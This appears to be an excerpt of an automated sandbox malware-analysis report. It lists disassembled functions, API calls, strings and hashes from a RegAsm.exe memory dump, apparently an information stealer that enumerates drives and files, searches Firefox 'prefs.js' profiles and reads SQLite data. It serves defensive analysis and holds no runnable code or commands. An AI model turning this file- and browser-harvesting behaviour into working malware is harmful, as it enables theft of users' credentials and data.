Part of subcall function 004153F6: StrCmpCA.SHLWAPI(?,00426850), ref: 00415495
Part of subcall function 004153F6: wsprintfA.USER32 ref: 004154B9
Part of subcall function 004153F6: StrCmpCA.SHLWAPI(?,0042656E), ref: 004154CA
Part of subcall function 004153F6: wsprintfA.USER32 ref: 004154F0
Part of subcall function 004153F6: memset.MSVCRT ref: 00415516
Part of subcall function 004153F6: lstrcat.KERNEL32(?,?), ref: 00415528
Part of subcall function 004153F6: strtok_s.MSVCRT ref: 00415561
Part of subcall function 004153F6: memset.MSVCRT ref: 00415576
Part of subcall function 004153F6: lstrcat.KERNEL32(?,?), ref: 0041558B

lstrcpy.KERNEL32(?,00000000), ref: 00415933
lstrlenA.KERNEL32(?), ref: 00415998

Strings

%DRIVE_REMOVABLE%, xrefs: 004158F9
*%DRIVE_FIXED%*, xrefs: 0041585C
*%DRIVE_REMOVABLE%*, xrefs: 0041587F
%DRIVE_FIXED%, xrefs: 00415917

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: memset$H_prologlstrcpywsprintf$Drivelstrcat$FileFindFirstLogicalStringsTypelstrlenstrtok_s
String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
API String ID: 2879972474-147700698
Opcode ID: e3eb360bc73c585ae8bd4f101531153a9debd20fc6c2823bd68ccc19b724b5fb
Instruction ID: 8fb32ebea5ed90456f7ca7ea911cfe9f81c0b13f291b8680dac0f4474b3225bb
Opcode Fuzzy Hash: e3eb360bc73c585ae8bd4f101531153a9debd20fc6c2823bd68ccc19b724b5fb
Instruction Fuzzy Hash: 395152B190025CEADF30AF61DC55EEE7B7DAF05344F50003ABA15A2191DB386A49CB59

Function 192ADB10 Relevance: 18.3, APIs: 12, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76853400a2affe72a5e31c583b1f8aefcdd7e5f3944a68d995fec766b5ddebaa
Instruction ID: 6871d5a73a7dddf78aa58fd4c3eb256902cb7cc93849796c901183d38d9fc5a6
Opcode Fuzzy Hash: 76853400a2affe72a5e31c583b1f8aefcdd7e5f3944a68d995fec766b5ddebaa
Instruction Fuzzy Hash: 0981E2B6604302ABD710DF68CC80B6BB3E9FF89314F98482DF985D7251E675E901CB92

Function 0040A981 Relevance: 17.9, APIs: 8, Strings: 2, Instructions: 431filestringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040A986
wsprintfA.USER32 ref: 0040A9AF
FindFirstFileA.KERNEL32(?,?), ref: 0040A9C6
StrCmpCA.SHLWAPI(?,00425EE4), ref: 0040A9E3
StrCmpCA.SHLWAPI(?,00425EE8), ref: 0040A9FD

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83

Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB

Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A

lstrlenA.KERNEL32(00000000,00425C2A,00000000,?,?,?,00425EEC,?,?,00425C27), ref: 0040AAAD

Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1

Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980

Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA

FindNextFileA.KERNEL32(00000000,?), ref: 0040AF44
FindClose.KERNEL32(00000000), ref: 0040AF53

Strings

#, xrefs: 0040AEFD
%s\*.*, xrefs: 0040A9A9

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$Filelstrcpy$Find$CloseCreatelstrcatlstrlen$AllocFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitwsprintf
String ID: #$%s\*.*
API String ID: 1095930517-2760317471
Opcode ID: 44786d5bb26080652ce45116025fd8843ac1bf083abf887969e34b348165104a
Instruction ID: a122975dc251b7c6bf4e58e1bde1a9732a5f2d9225262cdb85f580827bdd3275
Opcode Fuzzy Hash: 44786d5bb26080652ce45116025fd8843ac1bf083abf887969e34b348165104a
Instruction Fuzzy Hash: 9E027D70904248EACB15EBE5C856BDEBB78AF19304F4040BEE509B35C2DB785B4DCB66

Function 19260FB0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 180COMMON

Download Yara Rule

Strings

e, xrefs: 1926115A

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: e
API String ID: 0-4024072794
Opcode ID: 36bf8875baaf085edaede92fcfbfd96a80b42455c8294c9340591cc07f665f1e
Instruction ID: cf3cfe37fd8aa83ff6cb707cee752b95fec1678855aeeb772ef560c3aab0128e
Opcode Fuzzy Hash: 36bf8875baaf085edaede92fcfbfd96a80b42455c8294c9340591cc07f665f1e
Instruction Fuzzy Hash: 055117B26082429FDB04CF29DC80A67B7F5FF85312F28456AFC81865A2E731F994D791

Function 192ADFC0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 131COMMON

Download Yara Rule

Strings

%lld %lld, xrefs: 192AE055

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %lld %lld
API String ID: 0-3794783949
Opcode ID: 7dbe6d66e6b501a23149ada6deebdb416873d5517eb1443abc5c10b9816d9422
Instruction ID: 39aced35072a9b9c7359aab51bdea014b6646a4f7af3948b666a47e5f7cc82c7
Opcode Fuzzy Hash: 7dbe6d66e6b501a23149ada6deebdb416873d5517eb1443abc5c10b9816d9422
Instruction Fuzzy Hash: BB314AB62002017FE7119B28CC41F5B77BEEFC4711F688818F681A2291E772E912C7A7

Function 193514D0 Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 360COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 193515A2
API called with NULL prepared statement, xrefs: 19351571
API called with finalized prepared statement, xrefs: 19351586
misuse, xrefs: 193515AC
%s at line %d of [%.10s], xrefs: 193515B1

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-860711957
Opcode ID: c15d6ed8eaf2ee01eeb0e64f4edaf08e79d943afb6ef89b7750fdb6f8c8c77e5
Instruction ID: 2fa7b4a1d759a294c2ef495b33149c72d8b9970cec8df83f8b5dd8d4e49aaa3d
Opcode Fuzzy Hash: c15d6ed8eaf2ee01eeb0e64f4edaf08e79d943afb6ef89b7750fdb6f8c8c77e5
Instruction Fuzzy Hash: A3C1E1B59007419BF7208FA4C845F5777E9BF08354F0C4628EC9B9B281E776E949C7A2

Function 1935D4F0 Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 310COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1935D5DD
API called with NULL prepared statement, xrefs: 1935D5AC
API called with finalized prepared statement, xrefs: 1935D5C1
misuse, xrefs: 1935D5E7
%s at line %d of [%.10s], xrefs: 1935D5EC

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-860711957
Opcode ID: 4b16b8095435e2149e809d2c262f198b849fb83bf4668954fe9451e7932a821d
Instruction ID: 867d4a56991fff66d6113e8f849783c9c756f0939a3944c5f9c318ae2927499d
Opcode Fuzzy Hash: 4b16b8095435e2149e809d2c262f198b849fb83bf4668954fe9451e7932a821d
Instruction Fuzzy Hash: F4B1A1B59007419FF710CF24D849F5777E4BF49318F088A2CE8AA8B391E775E54A8B92

Function 004094E5 Relevance: 15.3, APIs: 10, Instructions: 301fileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004094EA

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83

Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB

Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A

FindFirstFileA.KERNEL32(00000000,?,00000000,?,00425E1C,?,?,00425BFA,?), ref: 00409567
StrCmpCA.SHLWAPI(?,00425E20), ref: 00409584
StrCmpCA.SHLWAPI(?,00425E24), ref: 0040959E
StrCmpCA.SHLWAPI(?,00000000,?,?,?,00425E28,?,?,00425BFB), ref: 00409635
StrCmpCA.SHLWAPI(?), ref: 004096B6

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980

Part of subcall function 00408759: _EH_prolog.MSVCRT ref: 0040875E

FindNextFileA.KERNEL32(00000000,?), ref: 0040989F
FindClose.KERNEL32(00000000), ref: 004098AE

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 2015904956-0
Opcode ID: 6b411533da6d038317f1010bc5ef33ac74c79a20e2959a98b71de90f1bc1be4d
Instruction ID: f469bbe6791ff6929fd52be51ed7484ae91504fa3db0a5c2044313ffea23fdba
Opcode Fuzzy Hash: 6b411533da6d038317f1010bc5ef33ac74c79a20e2959a98b71de90f1bc1be4d
Instruction Fuzzy Hash: 73C17270900249EADF10EBA5D9167DDBFB8AB09304F10417EE844B36C2DB785B08CBA6

Function 00409900 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 441fileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00409905

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB

Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00425BFE,00000000,75B0AC90), ref: 00409964
StrCmpCA.SHLWAPI(?,00425E34), ref: 00409981
StrCmpCA.SHLWAPI(?,00425E38), ref: 0040999B

Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83

Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1

Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221

Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA

FindNextFileA.KERNEL32(00000000,?), ref: 00409F07
FindClose.KERNEL32(00000000), ref: 00409F16

Strings

", xrefs: 00409E8A
\*.*, xrefs: 00409926

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$Filelstrcpy$Find$CloseCreatelstrcat$AllocFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitlstrlen
String ID: "$\*.*
API String ID: 1275501236-2874818444
Opcode ID: 2c1e854c0a35c54839475c5428221e5493d2a122586c7c8528810036778c4db7
Instruction ID: 1d715896bfc6fee1c5425f8939d85c219fb8e95ba328030b9625facc8afd5315
Opcode Fuzzy Hash: 2c1e854c0a35c54839475c5428221e5493d2a122586c7c8528810036778c4db7
Instruction Fuzzy Hash: E7124B71904149EACB15EBE5C956BEEBB78AF18308F5041BAE409735C2DF381B8CCB65

Function 0040B463 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 311fileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040B468

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83

Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB

Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A

FindFirstFileA.KERNEL32(00000000,?,00000000,?,00425F68,?,?,00425C47,?,00000000,?), ref: 0040B4E7
StrCmpCA.SHLWAPI(?,00425F6C,?,00000000,?), ref: 0040B50B
StrCmpCA.SHLWAPI(?,00425F70,?,00000000,?), ref: 0040B525
StrCmpCA.SHLWAPI(?,prefs.js,00000000,?,?,?,00425F74,?,?,00425C4A,?,00000000,?), ref: 0040B5C1

Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1

FindNextFileA.KERNEL32(?,?,?,00000000,?), ref: 0040B84A
FindClose.KERNEL32(?,?,00000000,?), ref: 0040B85B

Strings

prefs.js, xrefs: 0040B5B5

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrcpy$Find$Filelstrcat$CloseFirstNextSystemTimelstrlen
String ID: prefs.js
API String ID: 3307916976-3783873740
Opcode ID: d88a0d4bee5efbb6d72d1c948ffb4e4d47b202f2fe0720ae245bec799decf4f3
Instruction ID: be7758ef0e9bd93280a5f92db672ae0ad47210b716bb060d05ded798a66e6481
Opcode Fuzzy Hash: d88a0d4bee5efbb6d72d1c948ffb4e4d47b202f2fe0720ae245bec799decf4f3
Instruction Fuzzy Hash: C9D18471900248EADB14EBE5C956BDDBBB4AF19304F5040BEE409B36C2DB781B4CCB66

Function 19314D40 Relevance: 14.0, APIs: 9, Instructions: 476COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
